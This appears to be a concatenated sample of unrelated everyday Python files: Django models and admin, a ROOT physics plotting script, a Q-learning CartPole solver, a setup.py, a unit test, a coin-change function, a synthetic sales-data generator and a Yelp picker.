else:
params['ext_crowd_key'] = self.ext_crowd_key
if self.gmt_expired_time:
if hasattr(self.gmt_expired_time, 'to_alipay_dict'):
params['gmt_expired_time'] = self.gmt_expired_time.to_alipay_dict()
else:
params['gmt_expired_time'] = self.gmt_expired_time
if self.schedule_type:
if hasattr(self.schedule_type, 'to_alipay_dict'):
params['schedule_type'] = self.schedule_type.to_alipay_dict()
else:
params['schedule_type'] = self.schedule_type
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = LogicalRuleItemDTO()
if 'crowd_name' in d:
o.crowd_name = d['crowd_name']
if 'ext_crowd_key' in d:
o.ext_crowd_key = d['ext_crowd_key']
if 'gmt_expired_time' in d:
o.gmt_expired_time = d['gmt_expired_time']
if 'schedule_type' in d:
o.schedule_type = d['schedule_type']
if 'type' in d:
o.type = d['type']
return o
|
from django.contrib import admin
from blogs.models import Blog
from blogs.models import Post
from blogs.models import Comment
from blogs.models import Subscription
admin.site.register(Blog)
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Subscription) |
from django.db import models
from users.models import MainUser
from core.constants import TASK_STATUSES, TASK_TODO, TASK_DONE
class Project(models.Model):
"""
Project model
"""
name = models.CharField(max_length=300)
desc = models.TextField()
creator = models.ForeignKey(MainUser, on_delete=models.CASCADE, related_name='projects')
class Meta:
verbose_name = 'Project'
verbose_name_plural = 'Projects'
def __str__(self):
return self.name
@property
def tasks_count(self):
return self.tasks.count()
class TaskDoneManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(status=TASK_DONE)
def done_tasks(self):
return self.filter(status=TASK_DONE)
def filter_by_status(self, status):
return self.filter(status=status)
class TaskTodoManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(status=TASK_TODO)
def done_tasks(self):
return self.filter(status=TASK_DONE)
def filter_by_status(self, status):
return self.filter(status=status)
class Task(models.Model):
# STATUSES = (
# ('is_done', 'DONE'),
# ('is_todo', 'TODO'),
# ('is_tested', 'TESTED')
# )
name = models.CharField(max_length=300, null=True, blank=True)
# status = models.CharField(choices=STATUSES, max_length=20)
status = models.PositiveSmallIntegerField(choices=TASK_STATUSES, default=TASK_TODO)
project = models.ForeignKey(Project, on_delete=models.SET_NULL, related_name='tasks', null=True)
# is_done = models.BooleanField(default=False)
# is_todo = models.BooleanField(default=True)
# is_tested = models.BooleanField(default=False)
is_deleted = models.BooleanField(default=False)
objects = models.Manager()
done_tasks = TaskDoneManager()
todo_tasks = TaskTodoManager()
class Meta:
unique_together = ('project', 'name')
ordering = ('name', 'status',)
verbose_name = 'Task'
verbose_name_plural = 'Tasks'
db_table = 'my_tasks'
def __str__(self):
return self.name
def __repr__(self):
pass
# t = Task.objects.done_tasks()
# t = Task.objects.filter_by_status(TASK_DONE)
t1 = Task.done_tasks.all()
t2 = Task.todo_tasks.all()
# p = Project.objects.first()
# tasks = p.tasks.all()
# tasks = Task.objects.filter(project_id=p.id)
# class UserGroup(models.Model):
# user = models.ForeignKey(User)
# group = models.ForeignKey(Group)
# class Person(object):
# def __init__(self):
# self.name = ''
# self.age = 18
#
# def __str__(self):
# pass
#
# def hi(self):
# return 'hello'
class BaseTask(models.Model):
name = models.CharField(max_length=300)
desc = models.TextField()
def get_short_name(self):
return self.name[:3]
@property
def short_name(self):
return self.name[:3]
def set_name(self, name):
self.name = name
self.save()
def show_info(self):
raise NotImplementedError(
'must be implemented'
)
class Meta:
ordering = ('-name',)
abstract = True
class DeveloperTask(BaseTask):
name = models.CharField(max_length=200)
# tasks = models.Manager()
class Meta(BaseTask.Meta):
ordering = (BaseTask.Meta.ordering, 'desc')
unique_together = ('name', 'desc')
@classmethod
def fun(cls):
return cls.objects.all()
@staticmethod
def fun2(a, b):
return a + b
def fun3(self):
return DeveloperTask.objects.filter()
@classmethod
def fun4(cls, name):
return cls.objects.filter(name__contains=name)
def show_info(self):
return ''
class StaffTask(BaseTask):
message = models.CharField(max_length=100)
def show_info(self):
return ''
# d = DeveloperTask()
# s = StaffTask()
# d.fun4('asd', s)
# DeveloperTask.fun4()
# DeveloperTask.fun()
# d.set_name('ASd')
# res = d.fun2(2, 3)
res = DeveloperTask.fun2(2, 3)
# d.get_short_name()
|
#!/usr/bin/env python
from ROOT import *
import CMS_lumi
CMS_lumi.lumi_13TeV = "42 fb^{-1}"
#CMS_lumi.writeExtraText = 1
#CMS_lumi.writeExtraText2 = 1
CMS_lumi.extraText = "Preliminary"
import sys
import math
import array
gROOT.ProcessLine(".L ~/tdrStyle.C");
setTDRStyle()
gStyle.SetOptStat(0)
gROOT.SetBatch(True)
mc=sys.argv[1]
data=sys.argv[2]
data_inverted=sys.argv[3]
var=sys.argv[4]
ptbin=sys.argv[5]
selection=sys.argv[6]
normalize=sys.argv[7]
mcfile = TFile(mc)
datafile = TFile(data)
datafile_inverted = TFile(data_inverted)
print var+"__"+ptbin+"_l"+selection
handle = open("systematics.py",'r')
exec(handle)
handle.close()
allSystematics = []
allSystematics.extend(weightSystematics)
allSystematics.extend(shapeSystematics)
hl = mcfile.Get(var+"__"+ptbin+"_l"+selection)
hl.SetFillColor(4)
hl.SetLineColor(4)
hc = mcfile.Get(var+"__"+ptbin+"_c"+selection)
hc.SetFillColor(3)
hc.SetLineColor(3)
hb = mcfile.Get(var+"__"+ptbin+"_b"+selection)
hb.SetFillColor(2)
hb.SetLineColor(2)
htotalmc = hl.Clone()
htotalmc.Add(hc)
htotalmc.Add(hb)
systSquareUp=[]
systSquareDo=[]
for ibin in range(1, htotalmc.GetNbinsX()+1):
systSquareUp.append(0.)
systSquareDo.append(0.)
for syst in allSystematics:
print syst
htotalUp = mcfile.Get(hl.GetName()+"_"+syst+"_up")
htotalDo = mcfile.Get(hl.GetName()+"_"+syst+"_do")
hcUp = mcfile.Get(hc.GetName()+"_"+syst+"_up")
hcDo = mcfile.Get(hc.GetName()+"_"+syst+"_do")
hbUp = mcfile.Get(hb.GetName()+"_"+syst+"_up")
hbDo = mcfile.Get(hb.GetName()+"_"+syst+"_do")
htotalUp.Add(hcUp)
htotalUp.Add(hbUp)
htotalDo.Add(hcDo)
htotalDo.Add(hbDo)
for ibin in range(1, htotalmc.GetNbinsX()+1):
if htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) > 0:
systSquareUp[ibin-1] += (htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
if htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) <= 0:
systSquareDo[ibin-1] += (htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
if htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) > 0:
systSquareUp[ibin-1] += (htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
if htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) <= 0:
systSquareDo[ibin-1] += (htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
x = array.array('f')
y = array.array('f')
yr= array.array('f')
xl = array.array('f')
xh = array.array('f')
yl = array.array('f')
yh = array.array('f')
ylratio = array.array('f')
yhratio = array.array('f')
for ibin in range(1, htotalmc.GetNbinsX()+1):
x.append(htotalmc.GetBinCenter(ibin))
xl.append(htotalmc.GetBinWidth (ibin) / 2.)
xh.append(htotalmc.GetBinWidth (ibin) / 2.)
yr.append(1.)
if normalize != None:
y.append(htotalmc.GetBinContent (ibin)/htotalmc.Integral())
yl.append(math.sqrt(systSquareDo[ibin-1])/htotalmc.Integral())
yh.append(math.sqrt(systSquareUp[ibin-1])/htotalmc.Integral())
ylratio.append(math.sqrt(systSquareDo[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin)> 0 else 0.)
yhratio.append(math.sqrt(systSquareUp[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin)> 0 else 0.)
else:
y.append(htotalmc.GetBinContent (ibin))
yl.append(math.sqrt(systSquareDo[ibin-1]))
yh.append(math.sqrt(systSquareUp[ibin-1]))
ylratio.append(math.sqrt(systSquareDo[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin) > 0 else 0.)
yhratio.append(math.sqrt(systSquareUp[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin) > 0 else 0.)
tgrMC = TGraphAsymmErrors()
tgrMCRatio = TGraphAsymmErrors()
#print math.sqrt(systSquareDo[0]), htotalmc.GetBinContent (1), htotalmc.Integral(), ylratio[0]
tgrMC.SetLineColor(12)
tgrMC.SetFillColor(12)
tgrMC.SetLineWidth(2)
tgrMC.SetFillStyle(3004)
tgrMCRatio.SetLineColor(12)
tgrMCRatio.SetFillColor(12)
tgrMCRatio.SetLineWidth(2)
tgrMCRatio.SetFillStyle(3004)
for iBin in range(0, len(x)) :
tgrMC.SetPoint (iBin, x[iBin], y[iBin])
tgrMC.SetPointError(iBin, xl[iBin], xh[iBin], yl[iBin], yh[iBin])
tgrMCRatio.SetPoint (iBin, x[iBin], yr[iBin])
tgrMCRatio.SetPointError(iBin, xl[iBin], xh[iBin], ylratio[iBin], yhratio[iBin])
if normalize != None:
hl.Scale(1./htotalmc.Integral())
hc.Scale(1./htotalmc.Integral())
hb.Scale(1./htotalmc.Integral())
htotalmc.Scale(1./htotalmc.Integral())
stack = THStack()
stack.Add(hl)
stack.Add(hc)
stack.Add(hb)
hdata=datafile.Get(var+"__"+ptbin+""+selection)
hdata.SetMarkerStyle(20)
hdata.SetLineWidth(2)
hdata_inverted=datafile_inverted.Get(var+"__"+ptbin+""+selection)
hdata_inverted.SetNameTitle("inverted", "inverted")
hdata_inverted.SetMarkerStyle(21)
hdata_inverted.SetLineWidth(2)
legend=TLegend(0.7, 0.7, 0.9, 0.9)
legend.SetBorderSize(0)
legend.SetFillColor(0)
legend.AddEntry(hb, "b jets", "f")
legend.AddEntry(hc, "c jets", "f")
legend.AddEntry(hl, "light jets", "f")
legend.AddEntry(hdata, "data", "lp")
legend.AddEntry(hdata_inverted, "data (MC Calib)", "lp")
if normalize != None:
hdata.Scale(1./hdata.Integral())
hdata_inverted.Scale(1./hdata_inverted.Integral())
hratio=hdata.Clone()
hratio.Divide(htotalmc)
hratio_inverted=hdata_inverted.Clone()
hratio_inverted.Divide(htotalmc)
c = TCanvas()
pad1 = TPad("pad1", "pad1", 0, 1-0.72, 1, 1)
pad1.Draw()
pad1.cd()
stack.Draw("HIST")
tgrMC.Draw("2")
hdata.Draw("sames")
hdata_inverted.Draw("sames")
legend.Draw("same")
CMS_lumi.CMS_lumi(pad1, 4, 11)
pad1.RedrawAxis()
c.cd()
pad2 = TPad("pad2", "pad2",0,0,1,1-0.72)
pad2.SetTopMargin(0.000)
pad2.SetBottomMargin(0.392)
pad2.Draw()
pad2.cd()
oneLine = TLine(hratio.GetXaxis().GetXmin(), 1, hratio.GetXaxis().GetXmax(), 1);
oneLine.SetLineStyle(3)
oneLine.SetLineWidth(3)
hratio.GetXaxis().SetLabelSize(0.15)
hratio.GetYaxis().SetLabelSize(0.15)
hratio.GetYaxis().SetRangeUser(0., 2.)
hratio.GetYaxis().SetNdivisions(508)
hratio.Draw()
hratio_inverted.Draw("same")
tgrMCRatio.Draw("2")
#oneLine.Draw("same")
pad2.SetGridy()
pad2.RedrawAxis()
c.SaveAs("pics/"+var+"__"+ptbin+""+selection+".png")
pad1.cd()
pad1.SetLogy()
c.SaveAs("pics/log_"+var+"__"+ptbin+""+selection+".png")
#a=raw_input("ciao")
|
# Inspired by https://ferdinand-muetsch.de/cartpole-with-qlearning-first-experiences-with-openai-gym.html
# & https://medium.com/@tuzzer/cart-pole-balancing-with-q-learning-b54c6068d947&
import gym
import numpy as np
import math
from collections import deque
class QLearningCartPoleSolver():
def __init__(self):
self.env = gym.make('CartPole-v0')
self.n_episodes = 10000
self.win_score = 195
self.min_learning_rate = 0.1
self.min_exploration_rate = 0.1
self.discount_factor = 1.0
self.buckets = (1, 1, 6, 12,) # down-scaling feature space to discrete range
self.q_table = np.zeros(self.buckets + (self.env.action_space.n,))
def discretize(self, obs):
upper_bounds = [self.env.observation_space.high[0], 0.5, self.env.observation_space.high[2], math.radians(50)]
lower_bounds = [self.env.observation_space.low[0], -0.5, self.env.observation_space.low[2], -math.radians(50)]
ratios = [(obs[i] + abs(lower_bounds[i])) / (upper_bounds[i] - lower_bounds[i]) for i in range(len(obs))]
new_obs = [int(round((self.buckets[i] - 1) * ratios[i])) for i in range(len(obs))]
new_obs = [min(self.buckets[i] - 1, max(0, new_obs[i])) for i in range(len(obs))]
return tuple(new_obs)
def choose_action(self, state, exploration_rate):
return self.env.action_space.sample() if (np.random.random() <= exploration_rate) else np.argmax(self.q_table[state])
def update_q(self, old_state, action, reward, new_state, next_action, learning_rate):
self.q_table[old_state][action] += learning_rate * (reward + self.discount_factor * self.q_table[new_state][next_action] - self.q_table[old_state][action])
def get_exploration_rate(self, t):
return max(self.min_exploration_rate, min(1, 1.0 - math.log10((t + 1) / 25)))
def get_learning_rate(self, t):
return max(self.min_learning_rate, min(1.0, 1.0 - math.log10((t + 1) / 25)))
def run(self):
scores = deque(maxlen=100)
print(self.env.observation_space.shape)
for episode in range(self.n_episodes):
current_state = self.discretize(self.env.reset())
learning_rate = self.get_learning_rate(episode)
exploration_rate = self.get_exploration_rate(episode)
done = False
score = 0
while not done:
action = self.choose_action(current_state, exploration_rate)
obs, reward, done, _ = self.env.step(action)
new_state = self.discretize(obs)
next_action = self.choose_action(new_state, self.get_exploration_rate(episode+1))
self.update_q(current_state, action, reward, new_state, next_action, learning_rate)
current_state = new_state
score += reward
# Pritout of results
scores.append(score)
mean_score = np.mean(scores)
if mean_score >= self.win_score and episode >= 100:
print('Ran {} episodes. Solved after {} trials ✔'.format(episode, episode - 100))
return episode - 100
if episode % 100 == 0:
print('[Episode {}] - Mean survival time over last 100 episodes was {} ticks.'.format(episode, mean_score))
print('Did not solve after {} episodes 😞'.format(episode))
return episode
if __name__ == "__main__":
solver = QLearningCartPoleSolver()
solver.run() |
from django.db import models
class Repository(models.Model):
owner = models.CharField(max_length=100)
repo = models.CharField(max_length=100)
date = models.DateTimeField(default=None)
class Meta:
unique_together = (('owner', 'repo'),)
|
from sensor_adapters import Sensor
from sensor_libs.VirtualSensor import *
class VirtualHumiditySensor(Sensor.Sensor):
@classmethod
def get_data(self):
sensor = VirtualSensor()
return sensor.read_humidity()
|
from setuptools import setup
from io import open
import tomlkit
def _get_version():
with open('pyproject.toml') as pyproject:
file_contents = pyproject.read()
return tomlkit.parse(file_contents)['project']['version']
with open('README.md', 'r', encoding='utf-8') as f:
readme = f.read()
setup(
name='hello_python_cli',
version=_get_version(),
description='Simple python hello cli program',
long_description=readme,
long_description_content_type='text/markdown',
author='Mike Kinney',
author_email='mike.kinney@gmail.com',
packages=['hello_module'],
install_requires=[('docopt', 'tomlkit')],
scripts=['hello'],
)
|
#!/usr/bin/env python
import unittest
from chirp.common import timestamp
from chirp.library import constants
from chirp.library import ufid
class UFIDTest(unittest.TestCase):
def test_basic(self):
test_vol = 11
test_ts_human = "20090102-030405"
test_ts = timestamp.parse_human_readable(test_ts_human)
test_fp = "1234" * 10
# The UFID prefix should contain the volume and timestamp info.
self.assertEqual("vol0b/%s/" % test_ts_human, # 0b = 11
ufid.ufid_prefix(test_vol, test_ts))
# The UFID should equal the UFID prefix + the fingerprint.
test_ufid = ufid.ufid(test_vol, test_ts, test_fp)
self.assertEqual(ufid.ufid_prefix(test_vol, test_ts) + test_fp,
test_ufid)
# We should be able to make a tag too.
test_tag = ufid.ufid_tag(test_vol, test_ts, test_fp)
self.assertEqual("UFID", test_tag.FrameID)
self.assertEqual(constants.UFID_OWNER_IDENTIFIER, test_tag.owner)
self.assertEqual(test_ufid, test_tag.data)
# Make sure we can parse information back out of the test UFID.
vol, ts, fp = ufid.parse(test_ufid)
self.assertEqual(test_vol, vol)
self.assertEqual(test_ts, ts)
self.assertEqual(test_fp, fp)
# Raise ValueError if we try to parse a bad UFID.
self.assertRaises(ValueError, ufid.parse, "bad")
self.assertRaises(ValueError, ufid.parse,
"vol01/20091399-666666/" + "1"*40)
self.assertRaises(ValueError, ufid.parse,
"vol01/20991001-123456" + "1"*40)
if __name__ == "__main__":
unittest.main()
|
def coin_sort(amt:float) -> json:
# Dinominations
dinom = [1,5,10,25,50]
dinom_dict = {50:'half-dollar', 25:'quarter', 10:'dime'
, 5:'nickel', 1:'penny'}
num, rem = divmod(int(amt * 100),100)
result = {'silver-dollar': num}
while dinom:
coin = dinom.pop()
num, rem = divmod(rem, coin)
result[dinom_dict[coin]] = num
return json.dumps(result, indent=4)
if __name__ == '__main__':
import json
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 26 10:10:21 2018
@author: Administrator
"""
from datetime import datetime,timedelta,date
import holidays
import pandas as pd
import numpy as np
import json
try:
from itertools import izip as zip
except ImportError: # will be 3.x series
pass
#import date
i_holidays = holidays.India()
holiday_update={}
listt=[]
hd=[]
def load_json(path):
try:
with open(path) as data_file:
data=json.load(data_file)
return data
except:
print("Json File Not Loaded ")
def date_id(data):
dates=[]
headers=[]
for i in data['Header']:
n=i.get('name')
t=i.get('type')
headers.append(n)
if t=='SKUID':
v=i.get('values')
name1=n
if t=='date':
s=i.get('start')
e=i.get('end')
frmt=i.get('date_format')
name2=n
daterange = pd.date_range(s,e)
for i in daterange:
dates.append(i.strftime(frmt))
x=np.array(v)
y=np.array(dates)
data1= np.transpose([np.tile(x,len(y)),np.repeat(y,len(x))])
product=pd.DataFrame(data = data1.tolist(), columns = [name1,name2])
return data1,name1,name2,product,headers
def rand_data(data,l,product):
for i in data['Header']:
n=i.get('name')
t=i.get('type')
if t=='string':
v=i.get('values')
str=np.random.choice(v,l)
product[n]=str
if t=='decimal':
m=i.get('min')
ma=i.get('max')
pr=np.random.uniform(low=int(m),high=int(ma),size=l)
product[n]=pr
if t=='integer':
m=i.get('min')
ma=i.get('max')
pr=np.random.randint(low=m,high=ma,size=l)
product[n]=pr
return product
def fetch_hollist(data):
hol={}
for i in data['Holiday']:
n1=i.get('details')
n2=i.get('holiday_percentage')
n3=i.get('season_percentage')
n4=i.get('weekends_percentage')
hol[n1[0]]=[n1[1],n2,n3,n4]
return hol
def fetch_weekdays(date,percent,oldvalue,file):
#print(oldvalue)
newvalue=oldvalue
d=datetime.strptime(date,"%Y-%m-%d").date()
day=d.strftime('%A')
if day.lower()=='sunday' or day.lower()=='saturday':
newvalue=oldvalue + (oldvalue * int(percent)/100)
#print(newvalue)
return newvalue
def weather_data(region,d,percent,oldvalue):
#region='china'
flag=0
w={}
dd=datetime.strptime(d,'%Y-%m-%d')
month=dd.strftime('%B').lower()
w={'china':{'summer':'may,june,july','autumn':'july,august,september,october','winter':'november,december,january,february'},
'africa':{'dry':'december,january,may,june,july,august','rainy':'february,march,april,september,october,november'},
'amazon':{'summer':'february,march,april,may,june'},
'new zealand':{'spring':'september,october,november','summer':'december,january,february','autumn':'march,april,may','winter':'june,july,august'},
'australia':{'spring':'september,october,november','summer':'december,january,february','autumn':'march,april,may','winter':'june,july,august'},
'russia':{'winter':'december,january,february','spring':'march,april,may','summer':'june,july,august','autumn':'september,october,november'}
}
ddd=np.array(region)
if ddd[0] in w.keys():
for i in w[ddd[0]]:
if month in w[ddd[0]][i]:
newvalue=oldvalue + (oldvalue * int(percent)/100 )
return newvalue
else:
return oldvalue
def holiday_check(data):
for h in data["holiday_name"]:
h1=h.get('pub_holiday')
h2=h.get('pub_holiday_date')
print(h1)
print(h2)
holiday_update= {k: v for k, v in zip(h1,h2)}
for d in holiday_update.values():
i_holidays.append(d)
return i_holidays
def holilist_update(holiday_checks,datedata,percent,oldvalue):
newvalue1=oldvalue + (oldvalue * int(percent)/100)
return newvalue1
#print(newvalue1)
#print(newvalue1)
def date_check(holiday_checks,olddate):
flag=0
for i in holiday_checks:
dt1=i+timedelta(days=-10)
dt2=i+timedelta(days=10)
if dt1<=datetime.strptime(olddate,"%Y-%m-%d").date()<=dt2:
flag=1
break
return flag
def seaholweek(data):
for x in data['Header']:
h=x.get('name')
g=x.get('description')
if(g):
if 'sea' in g:
sheader=h
if 'week' in g:
wheader=h
if 'hol' in g:
hheader=h
if 'loc' in g:
loc=h
for y in data['Holiday']:
details=y.get('details')
time=details[1]
hper=y.get('holiday_percentage')
seper=y.get('season_percentage')
wper=y.get('weekends_percentage')
oldweek=r.loc[(r[id]==details[0]) & (r[d]==details[1]),wheader]
nw=fetch_weekdays(time,wper,oldweek,'s.json')
r.loc[(r[id]==details[0]) & (r[d]==time),wheader]=nw
oldsea=r.loc[(r[id]==details[0]) & (r[d]==details[1]),sheader]
print(oldsea)
region=r.loc[(r[id]==details[0]) & (r[d]==details[1]),loc]
neww=weather_data(region,time,seper,oldsea)
r.loc[(r[id]==details[0]) & (r[d]==time),sheader]=neww
print(neww)
oldday=r.loc[(r[id]==details[0]) & (r[d]==details[1]),hheader]
olddate= r.loc[(r[id]==details[0]) & (r[d]==details[1]),d]
ddate=np.array(olddate)
status=date_check(holiday_checks,ddate[0])
if status==1:
r.loc[(r[id]==details[0]) & (r[d]==details[1]),hheader]=holilist_update(holiday_checks,time,hper,oldday)
def file(data):
try:
file=data.get("filename")
r.to_csv(file,index=False)
return file
except:
print("enter correct file name ")
data=load_json(r's.json')
dataa,id,d,product,headers=date_id(data)
reg=data.get('location')
l=len(product)
r=rand_data(data,l,product)
holidays=fetch_hollist(data)
holiday_checks=holiday_check(data)
seaholweek(data)
file(data)
"""for x in holidays.keys():
for y in data['Header']:
h=y.get('name')
g=y.get('description')
if(g):
if 'sea' in g:
header=h
oldvalue=r.loc[(r[id]==x) & (r[d]==holidays[x][0]),h]
print(r.loc[(r[id]==x) & (r[d]==holidays[x][0]),'date'],x)"""
|
from YelpApi import business_search_results
import random
#print(business_search_results())
def just_pick():
random_pick = random.choice(business_search_results())
return random_pick
#print(random_pick) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.